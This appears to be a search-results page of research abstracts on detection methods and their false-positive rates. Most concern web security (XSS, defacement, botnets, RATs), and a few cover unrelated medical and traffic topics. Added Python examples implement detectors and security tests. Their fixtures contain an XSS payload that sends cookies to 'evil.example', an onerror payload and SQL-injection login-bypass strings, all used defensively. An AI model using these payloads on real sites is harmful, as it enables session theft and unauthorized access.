Security Testing Framework for Web Applications

2022 ◽  
pp. 453-479
Author(s):  
Layla Mohammed Alrawais ◽  
Mamdouh Alenezi ◽  
Mohammad Akour

The number of web-based applications has grown tremendously over the last two decades. While these applications bring huge benefits to society, they also suffer from various security threats. Although various techniques exist to ensure the security of web applications, a large number of applications still fall victim to a wide variety of attacks and incur financial losses. In this article, a security-testing framework for web applications is proposed, with the argument that the security of an application should be tested at every stage of the software development life cycle (SDLC). Security testing starts in the requirements engineering phase with a keyword-analysis phase, and the output of the first phase serves as input to the next phase. Several case-study applications indicate that the framework assists in the early detection of security threats and in applying appropriate security measures. The results obtained from the implementation of the proposed framework showed a high detection ratio with a low false-positive rate.

2018 ◽  
Vol 6 (3) ◽  
pp. 93-117 ◽  
Author(s):  
Layla Mohammed Alrawais ◽  
Mamdouh Alenezi ◽  
Mohammad Akour


Electronics ◽  
2020 ◽  
Vol 9 (11) ◽  
pp. 1894
Author(s):  
Chun Guo ◽  
Zihua Song ◽  
Yuan Ping ◽  
Guowei Shen ◽  
Yuhei Cui ◽  
...  

A Remote Access Trojan (RAT) is one of the most serious security threats that organizations face today. At present, the two major RAT detection approaches are host-based and network-based detection. So that each can complement the other's strengths, this article proposes a phased RAT detection method that combines double-sided features (PRATD). In PRATD, host-side and network-side features are combined to build detection models, which helps to distinguish RATs from benign programs because a RAT not only generates traffic on the network but also leaves traces on the host at run time. In addition, PRATD trains two different detection models for the two runtime states of a RAT in order to improve the True Positive Rate (TPR). Experiments on network and host records collected from five kinds of benign programs and 20 well-known RATs show that PRATD can detect RATs effectively: it achieves a TPR as high as 93.609% with a False Positive Rate (FPR) as low as 0.407% for known RATs, and a TPR of 81.928% with an FPR of 0.185% for unknown RATs, which suggests it is a competitive candidate for RAT detection.


Cephalalgia ◽  
2011 ◽  
Vol 31 (13) ◽  
pp. 1359-1367 ◽  
Author(s):  
WPJ van Oosterhout ◽  
CM Weller ◽  
AH Stam ◽  
F Bakels ◽  
T Stijnen ◽  
...  

Objective: To assess the validity of a self-administered web-based migraine questionnaire in diagnosing migraine aura, for use in epidemiological and genetic studies. Methods: Self-reported migraineurs were enrolled via the LUMINA website and, after fulfilling screening criteria, completed a web-based questionnaire on headache and aura symptoms. Diagnoses were calculated using an algorithm based on the International Classification of Headache Disorders (ICHD-2), and semi-structured telephone interviews were performed for final diagnoses. Logistic regression generated a prediction rule for aura. Algorithm-based diagnoses and predicted diagnoses were subsequently compared with the interview-derived diagnoses. Results: In 1 year, we recruited 2397 migraineurs, of whom 1067 were included in the validation. A seven-question subset provided higher sensitivity (86% vs. 45%), slightly lower specificity (75% vs. 95%), and similar positive predictive value (86% vs. 88%) in assessing aura compared with the ICHD-2-based algorithm. Conclusions: This questionnaire is accurate and reliable in diagnosing migraine aura among self-reported migraineurs and enables detection of more aura cases with a low false-positive rate.


Computers ◽  
2019 ◽  
Vol 8 (2) ◽  
pp. 35 ◽  
Author(s):  
Xuan Dau Hoang ◽  
Ngoc Tuong Nguyen

Defacement attacks have long been considered one of the prime threats to the websites and web applications of companies, enterprises, and government organizations. Defacement attacks can bring serious consequences to website owners, including immediate interruption of website operations and damage to the owner's reputation, which may result in huge financial losses. Many solutions have been researched and deployed for monitoring and detecting website defacement attacks, such as those based on checksum comparison, diff comparison, DOM tree analysis, and more complex algorithms. However, some solutions only work on static websites and others demand extensive computing resources. This paper proposes a hybrid defacement detection model that combines machine learning-based detection with signature-based detection. The machine learning-based detection first constructs a detection profile from training data of both normal and defaced web pages. It then uses the profile to classify monitored web pages as either normal or attacked. The machine learning-based component can effectively detect defacements of both static and dynamic pages. The signature-based detection, on the other hand, is used to boost the model's processing performance for common types of defacement. Extensive experiments show that our model produces an overall accuracy of more than 99.26% and a false positive rate of about 0.27%. Moreover, our model is suitable for implementing a real-time website defacement monitoring system because it does not demand extensive computing resources.
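As an added illustration of the hybrid design described in this abstract (example code written for this page, not the authors' model): a signature check runs first as the fast path, and only pages that match no signature are handed to a learned profile. A from-scratch multinomial naive Bayes over the visible words of a page stands in for the paper's machine-learning component; the signature list, the training pages and the test pages are all constructed for the example.

```python
"""Hybrid defacement check: signatures first, learned word profile second.
Everything here (signatures, pages, the naive-Bayes stand-in) is constructed
for illustration and is not the paper's model."""
import math
import re
from collections import Counter

# Signature stage: phrases typical of defacement pages (constructed list).
SIGNATURES = [re.compile(p, re.I) for p in (
    r"hacked\s+by", r"owned\s+by", r"your\s+security\s+is\s+(?:low|zero)",
    r"greetz", r"defaced")]
WORD_RE = re.compile(r"[a-z]{2,}")


def visible_text(html):
    """Strip tags; both stages look at what a visitor would actually read."""
    return re.sub(r"<[^>]+>", " ", html).lower()


def words(html):
    return WORD_RE.findall(visible_text(html))


class NaiveBayesProfile:
    """Multinomial naive Bayes over page words with add-alpha smoothing."""

    def __init__(self, alpha=1.0):
        self.alpha = alpha
        self.word_counts = {"normal": Counter(), "defaced": Counter()}
        self.doc_counts = {"normal": 0, "defaced": 0}
        self.vocab = set()

    def train(self, html, label):
        ws = words(html)
        self.word_counts[label].update(ws)
        self.doc_counts[label] += 1
        self.vocab.update(ws)

    def log_posterior(self, ws, label):
        total = sum(self.word_counts[label].values())
        denom = total + self.alpha * len(self.vocab)
        lp = math.log(self.doc_counts[label] / sum(self.doc_counts.values()))
        for w in ws:
            lp += math.log((self.word_counts[label][w] + self.alpha) / denom)
        return lp

    def classify(self, html):
        ws = words(html)
        return max(("normal", "defaced"), key=lambda lab: self.log_posterior(ws, lab))


class HybridDefacementDetector:
    def __init__(self, profile):
        self.profile = profile

    def check(self, html):
        """Returns (verdict, stage). A signature hit short-circuits the profile."""
        text = visible_text(html)
        if any(sig.search(text) for sig in SIGNATURES):
            return "defaced", "signature"
        return self.profile.classify(html), "profile"


# Constructed training pages: ordinary site content versus defacement pages.
NORMAL_PAGES = [
    "<html><head><title>Acme Store</title></head><body><h1>Welcome to Acme Store</h1>"
    "<p>Browse our catalog of products and add items to your cart. Free shipping on orders over 50.</p>"
    "<p>Contact support for help with your order.</p></body></html>",
    "<html><body><h1>Acme News</h1><p>Quarterly results announced today. Read the press release "
    "and the annual report.</p><p>Contact investor relations for more information.</p></body></html>",
    "<html><body><h1>Acme Support</h1><p>Search the knowledge base, open a ticket, or contact support "
    "by phone. Our team is available during business hours.</p></body></html>",
]
DEFACED_PAGES = [
    "<html><body><h1>Hacked by Team Zero</h1><p>Your security is low. Your server was owned. "
    "Admin, patch your system or we will return. Greetz to all our friends.</p></body></html>",
    "<html><body><h1>Owned</h1><p>We are the silent ghosts. Your site was compromised. "
    "Admin, your security is zero. Fear us.</p></body></html>",
    "<html><body><h1>Defaced</h1><p>This server was hacked. Your security is low. Patch your system. "
    "Greetz from the ghosts.</p></body></html>",
]
# Constructed probes: a defacement that matches no signature, and a fresh normal page.
SUBTLE_DEFACEMENT = ("<html><body><h1>We Are Back</h1><p>Your server was compromised by the ghosts. "
                     "Admin, patch your system. Fear us.</p></body></html>")
NEW_NORMAL_PAGE = ("<html><body><h1>Acme Blog</h1><p>Today we announced a new catalog with free shipping "
                   "for all orders. Contact our team for details.</p></body></html>")


def build_detector():
    profile = NaiveBayesProfile()
    for page in NORMAL_PAGES:
        profile.train(page, "normal")
    for page in DEFACED_PAGES:
        profile.train(page, "defaced")
    return HybridDefacementDetector(profile)


def demo():
    det = build_detector()
    return {
        "obvious": det.check("<html><body><h1>HACKED BY cyb3r</h1></body></html>"),
        "subtle": det.check(SUBTLE_DEFACEMENT),
        "normal": det.check(NEW_NORMAL_PAGE),
    }
```

Two practitioner caveats the abstract implies but does not spell out: the signature stage is only a fast path, so a legitimate page that quotes a phrase like "hacked by" (a security news item, for instance) will be flagged by it and never reach the profile; and the learned profile must be retrained as the site's own vocabulary drifts, otherwise dynamic content starts to look anomalous.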


2014 ◽  
Vol 5 (3) ◽  
pp. 1-15 ◽  
Author(s):  
Hossain Shahriar ◽  
Sarah North ◽  
Wei-Chuen Chen ◽  
Edward Mawangi

Cross-Site Scripting (XSS) has been ranked among the top three vulnerabilities over the last few years. An XSS vulnerability allows an attacker to inject arbitrary JavaScript code that is executed in the victim's browser to cause unwanted behaviour and security breaches. Despite the presence of many mitigation approaches, XSS is still widespread among today's web applications. As a result, there is a need to improve existing solutions and to develop novel attack detection techniques. This paper proposes a proxy-level XSS attack detection approach based on a popular information-theoretic measure known as Kullback-Leibler Divergence (KLD). The legitimate JavaScript code present in an application should remain similar or very close to the JavaScript code present in a rendered web page; a deviation between the two can be an indication of an XSS attack. This paper applies a back-off smoothing technique to effectively detect the presence of malicious JavaScript code in response pages. The proposed approach has been applied to a number of open-source PHP web applications containing XSS vulnerabilities. The initial results show that the approach can effectively detect XSS attacks and has a low false positive rate given a proper choice of KLD threshold values. Further, the performance overhead has been found to be negligible.
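An added worked example of the KLD idea (written for this page; it is not the authors' implementation): one baseline token distribution per path is learned from a clean response, and every later response for that path is scored by KL(P_page || Q_baseline), with a simple back-off scheme that reserves a small mass for tokens the baseline never saw so that log(p/q) is always defined. The tokenizer, the back-off constant beta, the threshold and the sample pages are all assumptions of the example.

```python
"""Per-path KLD scoring of the JavaScript in HTTP responses, as a proxy would
do it. Example code for this page, not the paper's code; tokenizer, beta,
threshold and the constructed pages are illustrative choices."""
import math
import re
from collections import Counter

# Identifiers, integer literals, or single punctuation characters.
TOKEN_RE = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]*|\d+|[^\sA-Za-z0-9_$]")
# Inline <script> bodies and double-quoted on*="..." handler values.
JS_RE = re.compile(r"<script\b[^>]*>(.*?)</script>|\son[a-z]+\s*=\s*\"([^\"]*)\"", re.I | re.S)


def extract_js(html):
    """All JavaScript fragments of a page, in page order."""
    return [m.group(1) if m.group(1) is not None else m.group(2) for m in JS_RE.finditer(html)]


def tokenize(js):
    return TOKEN_RE.findall(js)


def kl_divergence(page_tokens, base_counts, beta=0.01):
    """KL(P_page || Q_base) in nats. Back-off smoothing: when the page carries
    tokens absent from the baseline, a mass beta is taken from the baseline
    and shared equally among those tokens, so q(t) > 0 for every page token.
    When nothing is unseen the baseline is used as-is, so an identical page
    scores exactly 0."""
    if not page_tokens:
        return 0.0
    page_counts = Counter(page_tokens)
    n_page = len(page_tokens)
    n_base = sum(base_counts.values())
    unseen = [t for t in page_counts if t not in base_counts]
    denom = n_base + (beta if unseen else 0.0)
    total = 0.0
    for tok, c in page_counts.items():
        p = c / n_page
        q = base_counts[tok] / denom if tok in base_counts else beta / (denom * len(unseen))
        total += p * math.log(p / q)
    return total


class ProxyXssDetector:
    """One baseline token distribution per path, learned from a clean response."""

    def __init__(self, threshold=0.05, beta=0.01):
        self.threshold, self.beta, self.profiles = threshold, beta, {}

    def learn(self, path, clean_html):
        self.profiles[path] = Counter(t for js in extract_js(clean_html) for t in tokenize(js))

    def score(self, path, html):
        tokens = [t for js in extract_js(html) for t in tokenize(js)]
        return kl_divergence(tokens, self.profiles[path], self.beta)

    def is_attack(self, path, html):
        return self.score(path, html) > self.threshold


# Constructed responses for the hypothetical path /search.
CLEAN_PAGE = """<html><body>
<input id="q" value="">
<button onclick="runSearch()">Go</button>
<script>
function runSearch() {
  var q = document.getElementById('q').value;
  if (q.length === 0) { return false; }
  window.location = '/search?q=' + encodeURIComponent(q);
  return true;
}
</script>
</body></html>"""
# A harmless reflected value changes the attribute, not the JavaScript.
BENIGN_REFLECTION = CLEAN_PAGE.replace('value=""', 'value="cats"')
# Reflection that breaks out of the attribute and adds a script element.
SCRIPT_INJECTION = CLEAN_PAGE.replace(
    'value=""', 'value=""><script>new Image().src="//evil.example/c?"+document.cookie</script><i x="')
# Reflection that adds an event handler instead (fewer foreign tokens).
HANDLER_INJECTION = CLEAN_PAGE.replace(
    'value=""', 'value=""><img src=x onerror="alert(document.cookie)"><i x="')


def demo():
    det = ProxyXssDetector()
    det.learn("/search", CLEAN_PAGE)
    return {name: round(det.score("/search", page), 3) for name, page in (
        ("clean", CLEAN_PAGE), ("benign", BENIGN_REFLECTION),
        ("script", SCRIPT_INJECTION), ("handler", HANDLER_INJECTION))}
```

Two things the scores make visible: a page whose JavaScript is unchanged scores exactly zero, so harmless reflections into attributes or text cost nothing; and a short injected handler scores much lower than an injected script element, because the divergence is driven by the share of foreign tokens in the page. That is why the abstract ties the false positive rate to the choice of threshold, and in practice the threshold has to be calibrated against a corpus of clean responses for the same path, with a separate baseline for each legitimately varying variant of the page.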


2018 ◽  
Vol 2018 ◽  
pp. 1-10 ◽  
Author(s):  
Bakare K. Ayeni ◽  
Junaidu B. Sahalu ◽  
Kolawole R. Adeyanju

With improvements in computing and technological advances, web-based applications are now ubiquitous on the Internet. However, these web applications are becoming prone to vulnerabilities which have led to theft of confidential information, data loss, and denial of data access in the course of information transmission. Cross-site scripting (XSS) is a form of web security attack which involves the injection of malicious code into web applications from untrusted sources. Interestingly, recent research on web application security has centred on attack prevention and mechanisms for secure coding; recent methods for those attacks not only generate high false positives but also give little consideration to the users, who are often the victims of malicious attacks. Motivated by this problem, this paper describes an "intelligent" tool for detecting cross-site scripting flaws in web applications. It describes a method, implemented using fuzzy logic, for detecting classic XSS weaknesses and reports experimental results. Our detection framework recorded a 15% improvement in accuracy and a 0.01% reduction in the false-positive rate, which is considerably lower than that of the existing work by Koli et al. Our approach also serves as a decision-making tool for the users.


Author(s):  
Koohong Chung ◽  
Offer Grembek ◽  
Jinwoo Lee ◽  
Keechoo Choi

Two safety management tools have recently been developed for the California Department of Transportation (Caltrans). One is the continuous risk profile (CRP) approach, which is a network screening procedure, and the other is the California Safety Analyst (CASA), a web-based application designed to assist state safety engineers in conducting safety investigations and in documenting their findings. This paper provides a qualitative description of the two tools and summarizes feedback from more than 100 Caltrans safety engineers who attended demonstrations of the web-based application. Findings from both empirical analysis and the survey indicate that CRP can significantly reduce the false positive rate and that CASA can greatly improve the efficiency of traffic safety investigations. However, misunderstandings remain about the relationship between the CRP approach, other methods explained in the Highway Safety Manual, and different safety management tools. The misunderstandings create challenges for the deployment of CRP and CASA in California.


Author(s):  
A. F. Tappenden ◽  
T. Huynh ◽  
J. Miller ◽  
A. Geras ◽  
M. Smith

This article outlines a four-point strategy for the development of secure Web-based applications within an agile development framework and introduces strategies to mitigate security risks that are commonly present in Web-based applications. The proposed strategy includes the representation of security requirements as test cases supported by the open source tool FIT, the deployment of a highly testable architecture allowing for security testing of the application at all levels, the outlining of an extensive security testing strategy supported by the open source unit-testing framework HTTPUnit, and the introduction of the novel technique of security refactoring, which transforms insecure working code into functionally equivalent secure code. Today, many Web-based applications are not secure, and limited literature exists concerning the use of agile methods within this domain. It is the intention of this article to further discussion and research regarding the use of an agile methodology for the development of secure Web-based applications.
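An added example in Python of two of the four points above (not the article's code, which builds on FIT and HTTPUnit in Java): security requirements written as executable tests, and a security refactoring that turns a working but injectable login query into a functionally equivalent parameterized one, so the same requirement tests can be run against both versions. The schema, the sample accounts and the payloads are constructed for the example; passwords are stored in clear only to keep the example short, which a real refactoring would also fix.

```python
"""Security requirements as tests, and a security refactoring of a login
query. Example code for this page, not the article's; the schema, accounts
and payloads are constructed."""
import sqlite3


def make_db():
    """Constructed in-memory schema with two sample accounts."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT NOT NULL)")
    con.executemany("INSERT INTO users VALUES (?, ?)", [("alice", "s3cret"), ("bob", "hunter2")])
    return con


def login_before(con, username, password):
    """Working but insecure: untrusted input is spliced into the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_after(con, username, password):
    """Security refactoring: same contract, input bound as parameters by the driver."""
    row = con.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


# Security requirements as executable tests (the FIT idea, in plain Python).
def req_accepts_valid_credentials(login):
    return login(make_db(), "alice", "s3cret") == "alice"


def req_rejects_wrong_password(login):
    return login(make_db(), "alice", "wrong") is None


def req_resists_sql_injection(login):
    """Must never log anyone in when SQL metacharacters replace a secret."""
    for user, pwd in (("alice", "' OR '1'='1"), ("x' OR 1=1 --", "anything")):
        try:
            if login(make_db(), user, pwd) is not None:
                return False
        except sqlite3.Error:
            pass  # a failing query is acceptable; a successful login is not
    return True


def run_requirements(login):
    """Run every requirement against one implementation; a refactoring must
    keep the functional requirements green while turning the security one green."""
    checks = (req_accepts_valid_credentials, req_rejects_wrong_password, req_resists_sql_injection)
    return {c.__name__: c(login) for c in checks}
```

Running `run_requirements` against both versions shows what "functionally equivalent" means here: the two functional requirements pass for both implementations, and only the injection requirement distinguishes them, which is exactly the regression guard an agile team wants in place before and after the refactoring.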


2017 ◽  
Vol 2017 ◽  
pp. 1-11 ◽  
Author(s):  
Fu-Hau Hsu ◽  
Chih-Wen Ou ◽  
Yan-Ling Hwang ◽  
Ya-Ching Chang ◽  
Po-Ching Lin

Web-based botnets are popular nowadays. A Web-based botnet is a botnet whose C&C server and bots use the HTTP protocol, the most universal and widely supported network protocol, to communicate with each other. Because attackers can easily hide the botnet communication within the relatively massive volume of HTTP traffic, administrators of network equipment such as routers and switches cannot simply block such suspicious traffic outright, whatever the cost. Based on the client constituency of a Web server and the characteristics of the HTTP responses the server sends to its clients, this paper proposes a traffic inspection solution called Web-based Botnet Detector (WBD). WBD is able to detect suspicious C&C (Command-and-Control) servers of HTTP botnets regardless of whether the botnet commands are encrypted or hidden in normal Web pages. More than 500 GB of real network traces collected from 11 backbone routers are used to evaluate our method. Experimental results show that the false positive rate of WBD is 0.42%.
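An added example (not WBD's algorithm) of the two signals the abstract names, run over constructed access records: the client constituency of each server, meaning how many distinct clients poll it at near-constant intervals, and the uniformity of the responses those clients receive. The synthetic traffic, the per-client statistics and every threshold are assumptions of the example.

```python
"""Two C&C triage heuristics over HTTP access records: beaconing clients and
uniform responses. Example code for this page, not WBD; traffic and
thresholds are constructed."""
from collections import defaultdict
from statistics import mean, pstdev


def build_records():
    """Constructed access records (t_seconds, client, server, response_bytes)."""
    recs = []
    # Eight hypothetical bots poll cc.example about every 60 s (small jitter)
    # and always receive the same 312-byte command page.
    for b in range(8):
        for k in range(10):
            recs.append((100 + 7 * b + 60 * k + k % 3, f"10.0.0.{b + 1}", "cc.example", 312))
    # Five people browse www.example: irregular gaps, pages of many sizes.
    gaps = [3, 17, 2, 45, 9, 120, 6, 30, 1, 80]
    sizes = [5120, 812, 20480, 3302, 780, 9981, 15000, 2200, 640, 7300]
    for c in range(5):
        t = 50 + 11 * c
        for k in range(10):
            t += gaps[(k + c) % len(gaps)]
            recs.append((t, f"192.168.1.{c + 10}", "www.example", sizes[(3 * k + c) % len(sizes)]))
    return recs


def client_profiles(records, min_requests=3):
    """server -> client -> (gap_cv, distinct_size_ratio).
    gap_cv: std/mean of inter-request gaps (near 0 means metronomic polling).
    distinct_size_ratio: distinct response sizes / requests (near 0 means the
    same reply every time). Clients with too few requests are skipped."""
    by_server = defaultdict(lambda: defaultdict(list))
    for t, client, server, size in records:
        by_server[server][client].append((t, size))
    profiles = {}
    for server, clients in by_server.items():
        profiles[server] = {}
        for client, events in clients.items():
            if len(events) < min_requests:
                continue
            events.sort()
            gaps = [b[0] - a[0] for a, b in zip(events, events[1:])]
            avg = mean(gaps)
            cv = pstdev(gaps) / avg if avg > 0 else float("inf")
            sizes = [s for _, s in events]
            profiles[server][client] = (cv, len(set(sizes)) / len(sizes))
    return profiles


def suspicious_servers(records, max_cv=0.1, max_size_ratio=0.2, min_clients=3, min_fraction=0.6):
    """Flag servers whose client constituency is mostly beaconing clients that
    keep receiving uniform responses. Returns server -> sorted client list."""
    flagged = {}
    for server, clients in client_profiles(records).items():
        beaconing = sorted(c for c, (cv, ratio) in clients.items()
                           if cv <= max_cv and ratio <= max_size_ratio)
        if len(clients) >= min_clients and len(beaconing) >= min_fraction * len(clients):
            flagged[server] = beaconing
    return flagged
```

On the constructed traffic only `cc.example` is flagged, with all eight bots listed. The caveat a practitioner needs: software update pollers, monitoring agents and CDN health checks beacon in exactly this way, so the output is a triage list for an analyst, and the `min_fraction` requirement on the constituency (most clients of the server behave this way, not just a few) is what keeps a single cron job on a busy site from flagging it.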
